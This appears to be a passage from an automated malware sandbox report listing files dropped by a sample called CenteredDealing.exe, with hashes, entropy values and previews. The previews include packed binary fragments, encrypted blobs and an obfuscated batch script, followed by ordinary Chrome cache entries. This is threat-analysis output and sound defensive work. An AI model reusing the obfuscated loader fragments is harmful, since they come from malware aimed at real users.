                                                                                                                                                                                                                                                                      SSDEEP:3072:hg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf1:S5vPeDkjGgQaE/loUDtf1
                                                                                                                                                                                                                                                                      MD5:F01E782AE3C874A37D961CACBD4E275D
                                                                                                                                                                                                                                                                      SHA1:E82119C16215743533DFFA4B019D678AF80709C9
                                                                                                                                                                                                                                                                      SHA-256:3A9D5DE865B3736307BE9DB7C5E8D915B49BE7E9133C1F59D7B2BB64E29A0A71
                                                                                                                                                                                                                                                                      SHA-512:ABB59CFACDD4BF02B6B87608AF084D8DFA1310659CC2EB4CE3AEC25F3F1DDD566DEC27A44A32FA3A25B448704C1CCD2AD4D53289FF8E41781068DCC2801EDE1E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Root

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):74752
                                                                                                                                                                                                                                                                      Entropy (8bit):6.670224845607931
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:GBcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYmJ:4EoXnmowS2u5hVOoQ7t8T6pUkBJR8CTJ
                                                                                                                                                                                                                                                                      MD5:F6C613F0BFB3B0C58BDA17E905A3CEDB
                                                                                                                                                                                                                                                                      SHA1:1DE6513E41234CBFDB77F7B7034197F6051A4892
                                                                                                                                                                                                                                                                      SHA-256:C8EEA7B5623E04CE383A4769EB5C2D0AD61E1969EC723B56BEAC29D1CA89E99D
                                                                                                                                                                                                                                                                      SHA-512:0250E83B571D04ED1A84D50BBC103DFC228C6B942A6B31D87658FE864662DF96E576B27889BC942EED348E81F48CE6D3047DBFE25BDAD93D77A186B94C6B85F3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.E..@.....t.j.j..p...X.I.3.]...U..E..@.....t.j.j..p...X.I.]...U...u..u..u..u...P.I.]...U...u..M..u..I..k...]...U...u..M..u..I..B...]...U...u..M..u..I..;...]...U..V.u.W.}...t...V.P....G..H...t...Q.P..G._.p.3.^]...U.....}..t..E.P.E..p...4.I.3.....U..V.u..F...t..p...8.I..F..p.V.u..p..u...L.I...@..^]...U..QS..VW.K$.\...K4.z\...KD.r\....3.h..I..`T.f.H .K$.]"......L..K4......h..I.....N...F..F.3..^..FX.F..F..("..h..I..KD..".._..^[....Q.;.~....A..A..Q.;.~..Q..A..U...$SVWjc.5X#M.....(.I.P3.Wh.....vT..H.I...$.I.9~(v..v$.vT..9~H.= .I.v.h.....vT...vDP..~8.v.h.....vT...v4P....F .=..I.f..t.j.Ph....h.....vT..~..~.j..v.h....h.....vT..E.P.vT....I..M.."....M.U.E.+.M.M.+.E......U..M.9F.t..N..M.9F.t..F..E..>.~....E..~..~..F..E..F(...I.W.E..4...Y.M.;.u)..t..F$+.E....8...f;.uL.E......u.3...t..v$.vT..E.P..D.I.P....I..M..r....F.@.].t..E.+.+E.+...........@.M..F...}.t..E.+.+E..+......E.j.WSPQ.vT....I..E.P.vT..4.I..M.......E.+E....+E..E.Pj.j..vT....I..F..........z!... K.j....Ph.....vT...

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sends

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                                                                                                                      Entropy (8bit):6.586659174144973
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:bGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwh:hPtCZEMnVIPPBxT/sZydTmRxlHS3j
                                                                                                                                                                                                                                                                      MD5:5E6F0A508954223D320C20C3DC6EBFEE
                                                                                                                                                                                                                                                                      SHA1:6723A377134D7932EE1E036393C96110B81C2304
                                                                                                                                                                                                                                                                      SHA-256:918959362F31FFD1B193AF2891C29246BA18C6FB88D23DFAF6D3B7E831E6AFE2
                                                                                                                                                                                                                                                                      SHA-512:B36B0F06276CA0C653B823255FB14B8884393E4BBB0B4387E778F1FA1063F13014AEB974CD282701A0E43A194B251413F7A367E483BCC5CCADD1FA0BAA045D14
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:#M.............5.#M.....I.......M...j....P...Pj.j..5.#M.....I.......E..0$M..........b#M...P#M..}...... ....N....=h#M....A.....)M...........*....)....=g#M.........E.P...........u..u.QQ..)M....<...=.............................t0...t"...t..........j ^j.....j.^j.......j.........j.^t_j..].[.U.;.|R.......E.....t*.E.Pj.S.1....I....E.t..E.....t.....;.t..E.C....E.;.....~...S.....j../...j.^j..%.....j.......=f#M................I..................7......~.j.VVh..I.j...............j.VV.w|...........j..t...j.VVh..I.j.............X...j.VV.wl...........j..>....E........G...*.5..I.j.j..7..j.j..7..j.j..7..j.j..7...G...7.....I...3.8_.u.._..*....t$.E...g#M..PSj..7.E......E.........I..E.P....I..u.....I.S.u..u..u.S.7....I.SSS.u.....I.....!.......S.v<...v..q....D$$...F@....]....?...`....O...j.....I..o...3.f.......E.jXj.....E.P.....e............E.E..E.X....E.tL..E.....P.E..tL..E......E......E.`uL.....I...u.2.............P..D...\....u.hhuL..u..u..`..2........$.....t..D$p.D$t..i.....$.....

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sexuality

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):59392
                                                                                                                                                                                                                                                                      Entropy (8bit):5.828670342048589
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:D6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWD:D6u640ewy4Za9coRC2jfTq8Q9
                                                                                                                                                                                                                                                                      MD5:979152C6C3F75046A91CD8A96458E7BD
                                                                                                                                                                                                                                                                      SHA1:255CBF750792BCA6D563BD13B1F2222D65E7CCD6
                                                                                                                                                                                                                                                                      SHA-256:D80ADC900E1BC208DE694FBA009800918145C79E57A5C3421AA006CFBE7FEA03
                                                                                                                                                                                                                                                                      SHA-512:313A6D61C71C438160372AC200EF3D8F6D9338E96115BAC1E9103C5A09D92D5394435495D1147B1DF5720E7F2F7858AD38BAD4F901C657553788D33DB71AD079
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.E.P.u..u.....I....#j..E.P.E.Pj..u.....I.9}.u.9}........}..u.WWh....V.}...H.I..E.E..E..@.s4V.u.......E..E..E..E.Pj.hS...V.E.......H.I..E......b....E.E...T)M.......H8.@<.M.E...u5j.Wj!j.j.....I...T)M..U.Pj.h.......V.E...A8..H.I..E...u4j.Wj!j j ....I...T)M..U.PWh.......V.E....A<..H.I..E..M.................u..5..I.j.Q...u.E.j..u...}..u..E........E...U.u..H.I..M.;..`..X....X.......PWhK...V..\.....`......t....t..}..u..E...t.....X...PWhL...V..M.A.M.;M.~..E..U.RPh....V...u..5<.I....u...3.F.....M...z.._..^[....U..QQV.E.P.E.P.u..lU...........M..T)M.......0..........tZ...tC...t....t....ub.u..u.ho....I..M...E......Qj.h.....2j.j.h....V..H.I..}..~#j..u.h.......}..~.j..u.h....V..H.I.3.@..3.^....U..QQ.E.P.E.P.u..T....u.3.. .M..T)M.........;M.t..u..0R..3.@....U.....E.P.E.P.u..uT....u.3..h....M..@)M.VW.}.....M...E..T)M.....0....u.9E.u.9E.u.;.u.9E...$......M.QP.E.....I..U...u..}.+..}...M.u..E.+..E..E..U.P.E..M..0..x.I..M....u..M..M..U....u..U..E..HX.M..P\.x`.Hd.......;E.u%.......;.u.....

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Startup

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8665
                                                                                                                                                                                                                                                                      Entropy (8bit):5.169016611437142
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:eJiwx1mmlzr2Dw6tLO+ZTgZlQ1ium+PFOshoIkBGR2As6vXYJy2Fq5D9ZRLwKFMM:Xwxkqr2npZTgZlQPFJN5s6v0yV2KFQVI
                                                                                                                                                                                                                                                                      MD5:2D9D73D3DE18302F486606200FCC930B
                                                                                                                                                                                                                                                                      SHA1:5DC9EBBF5A05C136543EB1F6F257E014C8C096FC
                                                                                                                                                                                                                                                                      SHA-256:375342F340E7AF8561966BC5D796983E701F57BC593BF206F0829FC3B5C38273
                                                                                                                                                                                                                                                                      SHA-512:9CFC78BF30EFAD89992F798F256EB2D0C9DF7C951EB001E873CCA74C1589C574F774BDD59C150A65D4248761294E0E99427354A7F3EB29EF8A785E6F6A0883DA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:Set Whom=h..ZbpTo-Enhanced-Recognized-Expert-Bean-Stories-..SVCHarassment-Ivory-Executed-Sb-Replies-Taxi-Measurement-Supports-..lItGg-Valid-Term-Stands-Estates-Wayne-..RLCaused-Its-Character-Participate-Retro-Builds-Alan-..mdYSurgeons-Factor-Recruiting-Webmasters-Placed-..ELzCreate-Cell-Usc-..YJVegetables-Honda-Agency-Positive-Rain-..dFSecurities-Reply-Img-..oNFRMens-..Set Appear=9..NIxGba-Est-Belts-Database-Penalties-Expects-Ruth-Villa-..FepCheckout-..JSrAffect-Manga-Detection-Chronicles-Automatic-Annotation-Personal-..lJCVMs-Latina-Freeze-Jul-Cams-..sOGZCarrier-Performs-..qDZPrepaid-Prix-Tooth-German-Establish-..Set Specifics=v..fRVoyeur-Suites-..wVexContinuously-Fly-Arms-Align-..bAjjRays-Neighbor-Personal-Antarctica-Tire-..IkClay-Pal-Supplies-Nicole-Stage-Compromise-Swimming-Incoming-Advantages-..TkokUtility-Valve-Ultram-Driven-Tomorrow-Excerpt-..Set Automated=j..GzvApplication-..PoPoland-..IcParagraphs-Diana-Serbia-Tagged-Owners-Used-Kidney-Religion-Lt-..uoZjCharm-Controversy-Remix

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Startup.cmd (copy)

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (351), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8665
                                                                                                                                                                                                                                                                      Entropy (8bit):5.169016611437142
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:eJiwx1mmlzr2Dw6tLO+ZTgZlQ1ium+PFOshoIkBGR2As6vXYJy2Fq5D9ZRLwKFMM:Xwxkqr2npZTgZlQPFJN5s6v0yV2KFQVI
                                                                                                                                                                                                                                                                      MD5:2D9D73D3DE18302F486606200FCC930B
                                                                                                                                                                                                                                                                      SHA1:5DC9EBBF5A05C136543EB1F6F257E014C8C096FC
                                                                                                                                                                                                                                                                      SHA-256:375342F340E7AF8561966BC5D796983E701F57BC593BF206F0829FC3B5C38273
                                                                                                                                                                                                                                                                      SHA-512:9CFC78BF30EFAD89992F798F256EB2D0C9DF7C951EB001E873CCA74C1589C574F774BDD59C150A65D4248761294E0E99427354A7F3EB29EF8A785E6F6A0883DA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:Set Whom=h..ZbpTo-Enhanced-Recognized-Expert-Bean-Stories-..SVCHarassment-Ivory-Executed-Sb-Replies-Taxi-Measurement-Supports-..lItGg-Valid-Term-Stands-Estates-Wayne-..RLCaused-Its-Character-Participate-Retro-Builds-Alan-..mdYSurgeons-Factor-Recruiting-Webmasters-Placed-..ELzCreate-Cell-Usc-..YJVegetables-Honda-Agency-Positive-Rain-..dFSecurities-Reply-Img-..oNFRMens-..Set Appear=9..NIxGba-Est-Belts-Database-Penalties-Expects-Ruth-Villa-..FepCheckout-..JSrAffect-Manga-Detection-Chronicles-Automatic-Annotation-Personal-..lJCVMs-Latina-Freeze-Jul-Cams-..sOGZCarrier-Performs-..qDZPrepaid-Prix-Tooth-German-Establish-..Set Specifics=v..fRVoyeur-Suites-..wVexContinuously-Fly-Arms-Align-..bAjjRays-Neighbor-Personal-Antarctica-Tire-..IkClay-Pal-Supplies-Nicole-Stage-Compromise-Swimming-Incoming-Advantages-..TkokUtility-Valve-Ultram-Driven-Tomorrow-Excerpt-..Set Automated=j..GzvApplication-..PoPoland-..IcParagraphs-Diana-Serbia-Tagged-Owners-Used-Kidney-Religion-Lt-..uoZjCharm-Controversy-Remix

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\State

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                                                                                                                      Entropy (8bit):6.0205593496694645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:Acd0vtmgMbFuz08QuklMBNIimuzaAwusk:heAg0Fuz08XvBNbjaAtsk
                                                                                                                                                                                                                                                                      MD5:5F40468878ED32692F7CFB615F905B03
                                                                                                                                                                                                                                                                      SHA1:74C1FE8E6612B1B775FC28FA7E0FA0487996BCCF
                                                                                                                                                                                                                                                                      SHA-256:55FB1FB9E690370BF2652A453C8A229B8DD812B64E78C18840B302FA79222009
                                                                                                                                                                                                                                                                      SHA-512:1629509F7A56E3BAA21BC4FA8F8D1884703FA897632BB1A4652BC725566D3309E88A4B7EC9D34DCD1D39FCA2F08BCA12F1780AF317380837480E348B1E346A69
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:OJ.(...xcJ.j...@OJ......cJ.a....NJ......cJ.P....NJ......cJ......cJ.Q....NJ......cJ.R....OJ.-....cJ.r....OJ.1....cJ.x....PJ.:....cJ......NJ.....8PJ.?....cJ......cJ.S....OJ.2....dJ.y...hOJ.%....dJ.g...`OJ.$....dJ.f...$dJ......OJ.+...0dJ.m...<dJ.....(PJ.=...HdJ......PJ.;...TdJ......OJ.0...`dJ.....ldJ.w...xdJ.u....dJ.U....NJ......dJ......dJ.T....dJ......NJ......dJ......OJ.6....dJ.~....NJ......dJ.V....NJ......dJ.W....dJ......dJ......eJ......eJ......NJ..... eJ.X....OJ.....,eJ.Y... PJ.<...8eJ.....DeJ.....PeJ.v...\eJ......OJ.....heJ.[...POJ."...teJ.d....eJ......eJ......eJ......eJ......eJ......eJ......OJ......eJ.\...8XJ......eJ......fJ......fJ.....4fJ..... OJ.....LfJ.....XfJ.]....OJ.3...dfJ.z...@PJ.@...pfJ......PJ.8....fJ......PJ.9....fJ.....(OJ......fJ.^....fJ.n...0OJ......fJ._....OJ.5....fJ.|....GJ. ....fJ.b...8OJ......fJ.`....OJ.4....fJ......fJ.{...xOJ.'....gJ.i....gJ.o...(gJ.....8gJ.....HgJ.....TgJ.....`gJ.....lgJ.....xgJ.F....gJ.p...a.f.-.z.a...a.r.-.a.e...a.r.-.b.h...a.r.-.d.z...a.r.-.e.g

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Vienna

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):68608
                                                                                                                                                                                                                                                                      Entropy (8bit):7.997404908491138
                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                      SSDEEP:1536:n6PJG4PTW5bmpzlGIM4Woo2j3qW3Qgb4pL9Jd+96aUVUiLSP/5Fi:nUJP6lIlGN4Tgg0pLbd+9rUVUi2PW
                                                                                                                                                                                                                                                                      MD5:63C01C6583C814079EFC34F9F2E7768E
                                                                                                                                                                                                                                                                      SHA1:F13EF6330D780524903FD229D4F8D3E43AB2FDDA
                                                                                                                                                                                                                                                                      SHA-256:76EEF7A207D472148A334A431BA20A8818D92457BB658E990E9B32CDF6489E0B
                                                                                                                                                                                                                                                                      SHA-512:4E9D93822994F97D370FE93A23845B864041F0A2AE5675376898A4F0F87C7AA4A316CCD9ECCF1184EF67D09495A36C1263A54DADFF7482D51EFCF49ACEFD5EBF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..I.I. ..R.._F$?.}gt.P..&...}0D.!.=..P.....K...N<..>%l...{0..@..>...vKt.....d..n.C.d....t.B....L.=.Z.D.WpV.....^.6\.v........N:..'....}...5..i;Bv.]..A6.`....!..4._..8...iq}. +w.(..3....`..j5Ss.].b.M.....v......?..Dn.=..u...d~r.zP.-om.,...S.Y.....no...N.....M..a?....YA>a...TR....-...V n)d......`...,0:KS..o..Wp..V.i..=0.....\.......z..w...}*.........O..=f.M...[{).{....yw%...e...HIR.[...w..=".]/&.[V-1.*.Y....0..1.. D...._an.4....h\..5..-7...K.).|....Q:J0..d.$.W..........>...E....H."..w.#y..L.k.q.b.zn.~.......lv.p...&2*.s....6....U.....h.......+.u....0.........J...Q..-`]\.n...g.....$.v$........S.$.....\....(..-.QC..1,.?..f.B.l.`....J?Q...6c...iK.`......m.N...+.S ...iL.6.=...~I!....*<b..O...XK.bG..bd..."...f&.S.d.........3......t?:rl@...0...{z..<H.....7.7./..).^a......o../O5...m.>.T..^....(9D.z...._..y.XVv.... Xf&...%.......8E.....@^-./.S....I...S..1....y.Ae=../..A......M.......g.j.=KG.P..Ux......Z.....$x.C_ .A.....C...W.8..%2.....$G."<O.D.

                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Winston

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):82944
                                                                                                                                                                                                                                                                      Entropy (8bit):7.997588151658238
                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                      SSDEEP:1536:9XuiAOhllOqx+GFt4A4pIhr9W4qHJNm+18j77Xx0qSak0Iq+0x:ciAO/lTUGD4A2IFo4+zm+1OO3v0XFx
                                                                                                                                                                                                                                                                      MD5:C14496DA77D543FC678FA04A1E9AD51A
                                                                                                                                                                                                                                                                      SHA1:99D654B892E2DE0184E5C007B48B764744DE7C76
                                                                                                                                                                                                                                                                      SHA-256:D3A8D87393D6B38FA435FB90BFB3D31B4E4103D52D19855FC883BA594A093BCC
                                                                                                                                                                                                                                                                      SHA-512:B21500A88761C2C9E7A9E932AD8DBC50E1DB65D40E8AFBFF4BAEAC1A6709811A1BE49FBF0EEF6AD8DF085B1955B77AEC04F041BD7252550D96480F95DD803DBA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:...S..+....F..v^.....?p[..Y..o..4..o..{S.E.c.q.5..&..S.~...<...b. .y...~[5.e1w2Z+....@.c.7k.v.a.iLygK../.tv......~...1..-.R...9...M.aD.....TJ...4..15@c,.7Jsc!=.....[jP..3w..e..zJ*... .,....v-..o.... .^5..Wz.Ct..+.M."..6.......#TI....c..Q..0.v.-.A..9...,..B...i.3<.>......j+_.Vp..1jN..,.I..Z`.......~)..%"UF..l...0.Q.....Z...f.......N.\..$...Q..W.?.6.p&.....Q...o...!._u:....;4K.....+.j..A..T.b.rEuN+.Gv...r}L....W.bO.^P...z......"....>....a.....p.4.....5r...........-.)S..Yp8.6..i...LC{.*..''...E;N...Y...9....D .B.....,G......>C..J......2.I.!....E.t.t.CV...o.$so.......'...0.M."?e.........p..b..Oc.^W..c.^C...n.....;........V..D..aDX.1 .T..E?X...y..\<.....I....\|.....D$...a.3w.-...2.....bG.l..(..y...._...{.y.T....a.D_....f)..!....'.N)..i.|......V.v.QR.."..\6.....*C..g..g4..9..6.la1.5.\W...:p..kF.iZ.......x..q.'...r.Mj..c.".,......f.(.[...._........m.d(...c.z8..}.k...b.#.;.yK..m..K.O.R...pg.a4...:.....'.R M.....P.~X&.,....P.. ...IE...G#.

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 86

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5600)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5605
                                                                                                                                                                                                                                                                      Entropy (8bit):5.81248545513324
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:Y4BlictFd66666r3Dz3K4xarab7lvpNFtrTdoSO89q+2uc/H6666V4FutYiaALHa:Y437tFd66666r3DzalYTNFtrTO89Jc/g
                                                                                                                                                                                                                                                                      MD5:13E23008DE7ACE1F0DB49E61084534AA
                                                                                                                                                                                                                                                                      SHA1:0D10473756D024C306AF500D4DD0B63A8653EB96
                                                                                                                                                                                                                                                                      SHA-256:A5D0864BFDCE9DBB204346E49C6D3D5E01D2EDA50F6BEA2B8D5C4D2A3C5CC53C
                                                                                                                                                                                                                                                                      SHA-512:6A19C5C9FE2BC8EFB5E636310FA157F2401FE28591E17E69CC682C914B0BC4C23A39C34D6CB4685EDD3986490F8D30B3FD3B3EA9FDE969D3584BA1AC19B59433
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                      Preview:)]}'.["",["new laws 2025 california","apple iphone se","harry potter dark lord","julia grosso","polar vortex weather forecast","spacex rocket launch today","computer memory storage crossword clue","norwegian cruise ship man overboard"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wYzhsdhIpTG9yZCBWb2xkZW1vcnQg4oCUIEhhcnJ5IFBvdHRlciBjaGFyYWN0ZXIykwxkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0F3RUJBUUFBQUFBQUFBQUFBQUFEQlFJRUJnY0JBUC9FQURBUUFBSUJBd01DQXdjREJRQUFBQUFBQUFFQ0F3QUVFUVVTSVRGQkJoTlJGQ0l5WVhHUm9RZUIwUlVqd2VI

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 87

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):117446
                                                                                                                                                                                                                                                                      Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                      MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                      SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                      SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                      SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                      Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 88

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                      Chrome Cache Entry: 89

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
